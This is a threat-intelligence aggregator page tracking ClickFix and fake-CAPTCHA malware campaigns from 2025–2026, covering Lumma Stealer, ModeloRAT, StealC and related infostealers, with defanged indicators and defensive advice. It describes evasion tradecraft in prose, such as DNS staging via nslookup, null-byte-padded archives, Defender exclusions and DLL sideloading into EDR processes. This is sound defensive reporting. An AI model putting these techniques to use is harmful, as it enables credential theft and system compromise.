CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

First reported
Last updated
4 unique sources, 25 articles

Summary

Hide ▲

Microsoft has disclosed a new DNS-based variant of the ClickFix social engineering attack, while CTM360 reports an active campaign abusing Google Groups and Google-hosted infrastructure to distribute **Lumma Stealer** and a trojanized Chromium-based browser named *Ninja Browser*. The Google Groups campaign embeds organization-specific keywords into posts to lure victims into downloading oversized (950MB) password-protected archives or trojanized browsers, leveraging URL shorteners and Google Docs/Drive redirectors to evade detection. The Windows payload deploys Lumma Stealer via AutoIt-compiled executables, exfiltrating credentials and session cookies to C2 domains like `healgeni[.]live`. Linux targets receive *Ninja Browser*, which silently installs malicious extensions (e.g., *NinjaBrowserMonetisation*) capable of tracking, script injection, and remote command execution, while maintaining persistence through scheduled tasks. Earlier phases of this broader ClickFix ecosystem included DNS-based staging via `nslookup` to retrieve ModeloRAT, CastleLoader-driven Lumma Stealer surges, and macOS-focused campaigns delivering Odyssey Stealer. The evolution now integrates **trusted platform abuse** (Google Groups, DNS, blockchain), **cross-platform targeting** (Windows/Linux/macOS), and **multi-stage loaders** (AutoIt, Python, VBScript) to maximize evasion. Threat actors continue refining tradecraft, blending social engineering with technical evasion—such as oversized archives, obfuscated extensions, and SaaS infrastructure—to bypass security controls and maintain persistence despite 2025 law enforcement disruptions.

Timeline

  1. 15.02.2026 18:30 1 articles · 6h ago

    Google Groups campaign distributes Lumma Stealer and Ninja Browser via weaponized SaaS infrastructure

    CTM360 reports an active malware campaign abusing **over 4,000 malicious Google Groups** and **3,500 Google-hosted URLs** to distribute **Lumma Stealer** (Windows) and a trojanized Chromium-based browser named *Ninja Browser* (Linux). The attack chain begins with **social engineering in Google Groups**, where threat actors infiltrate industry forums to post technical discussions embedding malicious download links (e.g., "Download {Organization_Name} for Windows 10"). **Windows Infection Flow:** - Victims receive a **950MB password-protected archive** padded with null bytes to evade antivirus file-size thresholds. - The archive decompresses to ~33MB, launching an **AutoIt-compiled executable** that reassembles segmented binaries and decrypts a **memory-resident Lumma Stealer payload**. - Observed behaviors include browser credential exfiltration, session cookie harvesting, shell command execution, and HTTP POST requests to C2 infrastructure (e.g., `healgeni[.]live`) using `multipart/form-data` to mask exfiltrated content. **Linux Infection Flow:** - Victims are redirected to download *Ninja Browser*, a trojanized Chromium fork marketed as privacy-focused. - The browser silently installs the *NinjaBrowserMonetisation* extension, which: - Tracks users via **unique identifiers**. - Injects scripts and manipulates **browser tabs/cookies**. - Uses **heavily obfuscated JavaScript** (XOR/Base56-like encoding). - Polls attacker-controlled servers daily via **scheduled tasks** for silent updates. - Defaults to a **Russian-based search engine** (*X-Finder*) and redirects to suspicious AI-themed pages. **Infrastructure & Evasion:** - Abuses **Google’s trusted ecosystem** (Groups, Docs, Drive redirectors) to bypass filtering and URL shorteners to evade detection. - Linked to IPs **152.42.139[.]18**, **89.111.170[.]100**, and domains like `ninja-browser[.]com` and `nbdownload[.]space`. - Represents a broader trend of **SaaS platform weaponization**, where attackers exploit legitimate services to host and distribute malware while evading traditional defenses. **Defensive Recommendations:** - Inspect **shortened URLs** and **Google Docs/Drive redirect chains**. - Block IoCs at **firewall/EDR levels** and monitor for **scheduled task creation**. - Educate users against downloading software from **public forums** without verification. - Audit **browser extension installations** for unauthorized or obfuscated components.

    Show sources
    Open in new tab
  2. 15.02.2026 16:10 1 articles · 8h ago

    DNS-based ClickFix variant uses nslookup for malware staging

    Microsoft disclosed a new DNS-based ClickFix variant that abuses the `nslookup` command to stage and execute malware payloads. The attack begins with a command executed via the Windows Run dialog, performing a DNS lookup against a hard-coded external server to extract a `Name:` response, which is then executed as the second-stage payload. This technique uses DNS as a lightweight staging or signaling channel, blending malicious activity with normal network traffic and adding a validation layer before payload execution. The attack chain downloads a ZIP archive from the domain `azwsappdev[.]com`, extracts a malicious Python script to conduct reconnaissance and run discovery commands, and drops a VBScript responsible for launching **ModeloRAT**, a Python-based remote access trojan. Persistence is established by creating an LNK file in the Windows Startup folder, ensuring the malware runs at each system boot. The disclosure coincides with a surge in **Lumma Stealer** activity, driven by ClickFix-style fake CAPTCHA campaigns deploying **CastleLoader**, an AutoIt-based malware loader. CastleLoader checks for virtualization and security software before decrypting and launching Lumma Stealer in memory, with infections predominantly observed in India, France, and the U.S. Campaigns also distribute fake NSIS installers and VBA scripts, using scheduled tasks for persistence. One CastleLoader domain (`testdomain123123[.]shop`) was identified as a Lumma Stealer C2, suggesting potential collaboration or shared infrastructure between the operators. Additionally, macOS-focused ClickFix campaigns are delivering **Odyssey Stealer** (a rebrand of Poseidon Stealer), which targets cryptocurrency wallets and functions as a full RAT with SOCKS5 proxy capabilities. A **ClearFake** campaign leverages fake CAPTCHA lures on compromised WordPress sites to execute an HTA file and deploy Lumma Stealer, alongside **EtherHiding**—a technique using BNB Smart Chain contracts to fetch payloads from GitHub, blending malicious traffic with legitimate Web3 activity. The article underscores the growing sophistication of ClickFix, now incorporating DNS staging, multi-platform loaders, and blockchain-based evasion techniques to maintain resilience against takedown efforts.

    Show sources
    Open in new tab
  3. 27.01.2026 16:38 1 articles · 19d ago

    New ClickFix campaign abuses SyncAppvPublishingServer.vbs to distribute Amatera Stealer

    The new campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe. The campaign uses a fake CAPTCHA verification prompt to trick users into pasting and executing a malicious command on the Windows Run dialog. The obfuscated loader runs checks to ensure that it's not run within sandboxed environments. The loader fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver. The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory. The resulting script is decrypted, GZip decompressed in memory, and run using Invoke-Expression, ultimately culminating in the execution of a shellcode loader designed to launch Amatera Stealer. The campaign targets enterprise managed systems, as the virtualization solution is built only into Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions. The campaign is highly sophisticated and evasive, using in-memory PowerShell code execution and relying on blockchain and popular CDNs to avoid communicating with any infrastructure that's not a legitimate service. The campaign uses a multi-stage attack chain that includes a fake CAPTCHA verification prompt, abuse of SyncAppvPublishingServer.vbs, and retrieval of configuration data from a public Google Calendar file. The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2.

    Show sources
    Open in new tab
  4. 19.01.2026 11:09 2 articles · 27d ago

    CrashFix campaign delivers ModeloRAT via malicious Chrome extension

    A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures. The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands. The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content. The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite. The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'. The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard. Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop. The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims. The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes. The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools. The CrashFix command employs the legitimate Windows utility, finger.exe, to retrieve and execute the next-stage payload from the attacker's server. The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware. The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found. The script checks if the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type. For domain-joined machines, the campaign deploys ModeloRAT, a fully-featured Python-based Windows RAT that uses RC4 encryption for C2 communications. ModeloRAT sets up persistence using Registry and facilitates the execution of binaries, DLLs, Python scripts, and PowerShell commands. ModeloRAT is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection. For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase. KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration. Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025. Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals. Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions from trusted publishers or sources should keep you safe from CrashFix attacks or other threats. Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts.

    Show sources
    Open in new tab
  5. 17.11.2025 18:53 3 articles · 3mo ago

    EVALUSION ClickFix campaign delivers Amatera Stealer and NetSupport RAT

    A new EVALUSION ClickFix campaign has been discovered, delivering Amatera Stealer and NetSupport RAT. Amatera Stealer, an evolution of ACR Stealer, is available under a malware-as-a-service (MaaS) model and targets crypto-wallets, browsers, messaging applications, FTP clients, and email services. It employs advanced evasion techniques such as WoW64 SysCalls and is packed using PureCrypter. The stealer is injected into the MSBuild.exe process to harvest sensitive data and contact an external server to execute a PowerShell command to fetch and run NetSupport RAT. The campaign also involves phishing attacks using various malware families and phishing kits named Cephas and Tycoon 2FA. Tycoon 2FA is a phishing kit that bypasses multi-factor authentication (MFA) and authentication apps by intercepting usernames, passwords, session cookies, and MFA flows in real-time. It has been used in over 64,000 attacks this year, primarily targeting Microsoft 365 and Gmail. The kit includes anti-detection layers and can lead to total session takeover, allowing attackers to move laterally into various enterprise systems. Legacy MFA methods like SMS codes, push notifications, and TOTP apps are vulnerable to Tycoon 2FA due to their reliance on user behavior. Criminal groups such as Scattered Spider, Octo Tempest, and Storm 1167 are using Tycoon 2FA daily. Phishing-proof MFA solutions, such as Token Ring and Token BioStick, use biometric authentication, proximity-based checks, and domain binding to prevent phishing attacks. Token Ring and Token BioStick solutions are inexpensive, available today, and provide a better user experience with faster authentication times.

    Show sources
    Open in new tab
  6. 17.09.2025 17:01 2 articles · 5mo ago

    MetaStealer attack uses fake Cloudflare Turnstile and MSI package

    The MetaStealer attack, a variant of the ClickFix family, uses a fake Cloudflare Turnstile lure and an MSI package disguised as a PDF to deploy the MetaStealer infostealer malware. The attack involves a multi-stage infection chain that includes a DLL sideloading technique using a legitimate SentinelOne executable. The MetaStealer attack targets crypto wallets and other sensitive information, using a combination of social engineering and technical evasion techniques to deploy malware.

    Show sources
    Open in new tab
  7. 16.09.2025 15:00 9 articles · 5mo ago

    FileFix attack impersonates Meta and deploys StealC infostealer

    A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. The campaign exploits Blender's Auto Run feature to execute embedded Python scripts that fetch a malware loader from a Cloudflare Workers domain. The loader then retrieves a PowerShell script that downloads two ZIP archives, which unpack into the %TEMP% folder and drop LNK files in the Startup directory for persistence. The campaign deploys two payloads: the StealC infostealer and an auxiliary Python stealer. The StealC malware used in this campaign is the latest variant of the second major version, with expanded data-stealing capabilities and support for exfiltration from various browsers, cryptocurrency wallets, messaging apps, VPN clients, and mail clients. Despite being documented since 2023, the malware remains elusive to anti-virus products, with no security engine on VirusTotal detecting the analyzed variant. The campaign has been active for at least six months, involving the implantation of malicious .blend files on platforms like CGTrader. The attack chains involve uploading malicious .blend files containing a malicious "Rig_Ui.py" script, which is executed as soon as the files are opened with Blender's Auto Run feature enabled. The Rig_Ui.py script fetches a PowerShell script to download two ZIP archives, one of which contains a payload for StealC V2, while the second archive deploys a secondary Python-based stealer on the compromised host. The updated version of StealC supports a wide range of information gathering features, allowing data to be extracted from various browsers, web plugins, cryptocurrency wallet apps, messaging services, VPNs, and email clients. The campaign shares similarities with a prior campaign linked to Russian-speaking threat actors, involving impersonating the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2. Blender's documentation acknowledges the security risk posed by the ability to include Python scripts within blend-files, which can execute arbitrary Python scripts. Cybersecurity researchers have disclosed a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer. By exploiting this vulnerability, researchers gathered system fingerprints, monitored active sessions, and stole cookies from the StealC control panel. The StealC malware, first emerged in January 2023 under a malware-as-a-service (MaaS) model, has been distributed via YouTube as part of a campaign known as the YouTube Ghost Network. The malware has also been propagated via rogue Blender Foundation files and a social engineering tactic known as FileFix. StealC has received updates, including Telegram bot integration for notifications, enhanced payload delivery, and a redesigned panel, codenamed StealC V2. The source code for the StealC administration panel was leaked, providing insights into the threat actor's operations. A StealC customer named YouTubeTA used Google's video-sharing platform to distribute the stealer by advertising cracked versions of Adobe Photoshop and Adobe After Effects, amassing over 5,000 logs containing 390,000 stolen passwords and more than 30 million stolen cookies. YouTubeTA is suspected of seizing control of legitimate YouTube accounts to promote cracked software and using ClickFix-like fake CAPTCHA lures to distribute StealC. The StealC panel allows operators to create multiple users and differentiate between admin users and regular users. YouTubeTA operated from an Eastern European country where Russian is commonly spoken, using an Apple M3 processor-based machine. An operational security blunder revealed YouTubeTA's real IP address, associated with a Ukrainian provider called TRK Cable TV. The StealC developers exhibited weaknesses in cookie security and panel code quality, allowing researchers to gather data about their customers.

    Show sources
    Open in new tab
  8. 21.08.2025 19:25 14 articles · 5mo ago

    UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

    The ClickFix attacks now feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands. The attacks are primarily promoted through malvertizing on Google Search and exploit known flaws on outdated WordPress plugins to compromise legitimate sites. The payloads delivered in these attacks include MSHTA executable, PowerShell scripts, and living-off-the-land binaries. Additionally, threat actors have been abusing the decades-old Finger protocol to retrieve and execute remote commands on Windows devices. The Finger protocol is used to deliver commands that create a random-named path, download a zip archive disguised as a PDF, and extract a Python malware package. The Python program is executed using pythonw.exe __init__.py, and a callback is made to the attacker's server to confirm execution. A related batch file indicates that the Python package is an infostealer. Another campaign uses the Finger protocol to retrieve and run commands that look for malware research tools and exit if found. If no malware analysis tools are found, the commands download a zip archive disguised as PDF files and extract the NetSupport Manager RAT package. The commands configure a scheduled task to launch the remote access malware when the user logs in. A new EVALUSION ClickFix campaign has been discovered, delivering Amatera Stealer and NetSupport RAT. Amatera Stealer, an evolution of ACR Stealer, is available under a malware-as-a-service (MaaS) model and targets crypto-wallets, browsers, messaging applications, FTP clients, and email services. It employs advanced evasion techniques such as WoW64 SysCalls and is packed using PureCrypter. The stealer is injected into the MSBuild.exe process to harvest sensitive data and contact an external server to execute a PowerShell command to fetch and run NetSupport RAT. ClickFix attack variants have been observed using a realistic-looking Windows Update animation in a full-screen browser page to trick users into executing malicious commands. The new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers. The attack uses steganography to encode the final malware payload inside an image. The process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state. The shellcode holding the infostealer samples is packed using the Donut tool. The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13. A new campaign codenamed JackFix leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising. The JackFix campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code. The attack heavily leans on obfuscation to conceal ClickFix-related code and blocks users from escaping the full-screen alert by disabling the Escape and F11 buttons, along with F5 and F12 keys. The initial command executed is an MSHTA payload that's launched using the legitimate mshta.exe binary, which contains JavaScript designed to run a PowerShell command to retrieve another PowerShell script from a remote server. The PowerShell script attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged. The PowerShell script serves up to eight different payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other unspecified loaders and RATs. The threat actor often changes the URI used to host the first mshta.exe stage and has been observed moving from hosting the second stage on the domain securitysettings.live to xoiiasdpsdoasdpojas.com, although both point to the same IP address 141.98.80.175. An initial access broker tracked as Storm-0249 is abusing endpoint detection and response solutions and trusted Microsoft Windows utilities to load malware, establish communication, and persistence in preparation for ransomware attacks. The threat actor has moved beyond mass phishing and adopted stealthier, more advanced methods that prove effective and difficult for defenders to counter. In one attack analyzed by researchers at cybersecurity company ReliaQuest, Storm-0249 leveraged the SentinelOne EDR components to hide malicious activity. The attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. A malicious PowerShell script is also fetched from a spoofed Microsoft domain, which is piped straight onto the system's memory, never touching the disk and thus evading antivirus detection. The MSI file drops a malicious DLL (SentinelAgentCore.dll), which is placed strategically alongside the pre-existing, legitimate SentinelAgentWorker.exe, which is already installed as part of the victim's SentinelOne EDR. Next, the attacker loads the DLL using the signed SentinelAgentWorker (DLL sideloading), executing the file within the trusted, privileged EDR process and obtaining stealthy persistence that survives operating system updates. Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic. The compromised systems are profiled using 'MachineGuid,' a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use for binding encryption keys to specific victims. The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring. The researchers recommend that system administrators rely on behavior-based detection that identifies trusted processes loading unsigned DLLs from non-standard paths. Furthermore, it is helpful to set stricter controls for curl, PowerShell, and LoLBin execution. A new variation of the ClickFix attack dubbed 'ConsentFix' abuses the Azure CLI OAuth app to hijack Microsoft accounts without the need for a password or to bypass multi-factor authentication (MFA) verifications. ConsentFix tricks victims into completing the Azure CLI OAuth flow and steals the resulting authorization code, which is exchanged for full account access. The attack starts with victims landing on a compromised, legitimate website that ranks high on Google Search results. Victims are shown a fake Cloudflare Turnstile CAPTCHA widget that asks for a valid business email address, filtering out bots and non-targets. Victims are instructed to click a 'Sign in' button that opens a legitimate Microsoft URL in a new tab, leading to an Azure login page. The attack completes when victims paste the URL containing the Azure CLI OAuth authorization code into the malicious page, granting attackers access to the Microsoft account via Azure CLI. The attack triggers only once per victim IP address, preventing repeated phishing attempts on the same IP. Defenders are advised to monitor for unusual Azure CLI login activity, such as logins from new IP addresses, and to check for legacy Graph scopes used by attackers to evade detection. Over the past six months, hackers have increasingly relied on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials. The BitB phishing technique was developed by security researcher mr.d0x in 2022. In a BitB attack, users who visit attacker-controlled webpages are presented with a fake browser pop-up containing a login form. The pop-up is implemented using an iframe that imitates the authentication interface of legitimate platforms and can be customized with a window title and URL that make the deception more difficult to detect. Recent phishing campaigns targeting Facebook users impersonate law firms claiming copyright infringement, threatening imminent account suspension, or Meta security notifications about unauthorized logins. To avoid detection and to increase the sense of legitimacy, cybercriminals added shortened URLs and fake Meta CAPTCHA pages. In the final stage of the attack, victims are prompted to log in by entering their Facebook credentials in a fake pop-up window. Trellix discovered a high number of phishing pages hosted on legitimate cloud platforms like Netlify and Vercel, which mimic Meta's Privacy Center portal, redirecting users to pages disguised as appeal forms that collected personal information. These campaigns constitute a significant evolution compared to standard Facebook phishing campaigns that security researchers typically observe. A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures. The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands. The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content. The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite. The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'. The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard. Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop. The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims. The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes. The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools. The CrashFix command employs the legitimate Windows utility, finger.exe, to retrieve and execute the next-stage payload from the attacker's server. The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware. The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found. The script checks if the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type. For domain-joined machines, the campaign deploys ModeloRAT, a fully-featured Python-based Windows RAT that uses RC4 encryption for C2 communications. ModeloRAT sets up persistence using Registry and facilitates the execution of binaries, DLLs, Python scripts, and PowerShell commands. ModeloRAT is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection. For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase. KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration. Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025. Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals. Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions from trusted publishers or sources should keep you safe from CrashFix attacks or other threats. Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts. The new campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe. The campaign uses a fake CAPTCHA verification prompt to trick users into pasting and executing a malicious command on the Windows Run dialog. The obfuscated loader runs checks to ensure that it's not run within sandboxed environments. The loader fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver. The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory. The resulting script is decrypted, GZip decompressed in memory, and run using Invoke-Expression, ultimately culminating in the execution of a shellcode loader designed to launch Amatera Stealer. The campaign targets enterprise managed systems, as the virtualization solution is built only into Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions. The campaign is highly sophisticated and evasive, using in-memory PowerShell code execution and relying on blockchain and popular CDNs to avoid communicating with any infrastructure that's not a legitimate service. The campaign uses a multi-stage attack chain that includes a fake CAPTCHA verification prompt, abuse of SyncAppvPublishingServer.vbs, and retrieval of configuration data from a public Google Calendar file. The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2. **New Development:** Microsoft has disclosed a DNS-based ClickFix variant that uses the `nslookup` command to stage payloads via DNS queries, retrieving a second-stage payload from a hard-coded DNS server. This attack chain downloads a ZIP archive from `azwsappdev[.]com`, extracts a Python script for reconnaissance, and deploys **ModeloRAT** via a VBScript, with persistence established through an LNK file in the Windows Startup folder. Concurrently, Bitdefender reports a surge in **Lumma Stealer** activity driven by ClickFix-style campaigns deploying **CastleLoader**, an AutoIt-based loader that evades detection by checking for virtualization and security tools. Lumma Stealer infections are geolocated primarily in India, France, and the U.S. The article also details macOS-focused ClickFix campaigns delivering **Odyssey Stealer** (a Poseidon Stealer rebrand) and **ClearFake** campaigns leveraging EtherHiding via BNB Smart Chain to fetch payloads. The evolution of ClickFix now includes DNS-based staging, expanded loader integration, and cross-platform targeting, demonstrating resilience despite 2025 law enforcement disruptions.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Trojanized 7-Zip installer distributes proxy malware

A fake 7-Zip website distributes a malicious installer that turns infected computers into residential proxy nodes. The campaign uses a trojanized version of the 7-Zip tool, which includes legitimate functionality but also installs proxy malware. The malware communicates with command-and-control (C2) servers using obfuscated messages and avoids detection by checking for virtualization and debuggers. The threat actor registered the domain 7zip[.]com, mimicking the legitimate 7-Zip website. The malware modifies firewall rules to allow inbound and outbound connections and collects system information, which is sent to a remote server. The campaign also involves trojanized installers for other popular applications like HolaVPN, TikTok, WhatsApp, and Wire VPN.

Open in new tab

341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer

A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These addons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands which then steals crypto assets like exchange API keys, wallet private keys, SSH credentials, and browser passwords.

Open in new tab

Android Malware Campaign Abuses Hugging Face Platform

A new Android malware campaign leverages the Hugging Face platform to distribute thousands of variants of an APK payload designed to steal credentials from popular financial and payment services. The attack begins with a dropper app called TrustBastion, which uses scareware-style ads to lure victims into installing it. The malware then redirects to a Hugging Face repository to download the final payload, using server-side polymorphism to evade detection. The malware exploits Android’s Accessibility Services to capture screenshots, monitor user activity, and steal credentials. The campaign was discovered by Bitdefender researchers, who found over 6,000 commits in the repository. The repository was taken down but resurfaced under a new name, 'Premium Club,' with the same malicious code. Bitdefender has published indicators of compromise and informed Hugging Face, which removed the malicious datasets. The infection chain begins when users download the malicious Android app TrustBastion, which appears as scareware via popups claiming the device is infected with malware. The dropper app prompts users to run an update that mimics legitimate Google Play and Android system update dialog boxes. The dropper contacts an encrypted endpoint hosted at trustbastion[.]com, which returns an HTML file containing a redirect link to the Hugging Face repository hosting the malware. The malware masquerades as a 'Phone Security' feature to guide users through enabling Accessibility Services. The malware requests permissions for screen recording, screen casting, and overlay display to monitor all user activity and capture screen content. The malware captures lockscreen information for security verification of financial and payment services.

Open in new tab

Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace

A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.

Open in new tab

Multi-Stage AitM Phishing and BEC Campaigns Target Energy Sector

Microsoft has identified a multi-stage adversary-in-the-middle (AitM) phishing and business email compromise (BEC) campaign targeting organizations in the energy sector. The attackers abused SharePoint file-sharing services to deliver phishing payloads and created inbox rules to maintain persistence and evade detection. The campaign involved leveraging compromised internal identities to conduct large-scale phishing attacks within and outside the victim organizations. Additionally, the AgreeTo Outlook add-in was hijacked and turned into a phishing kit, stealing over 4,000 Microsoft account credentials. The threat actor deployed a fake Microsoft sign-in page, password collection page, exfiltration script, and redirect, exploiting the add-in's ReadWriteItem permissions. This is the first known instance of malware found on the official Microsoft Marketplace. The add-in was abandoned by its developer and the attacker exploited the abandoned domain to serve the phishing kit. The incident highlights the need for better monitoring of add-ins and their associated URLs.

Open in new tab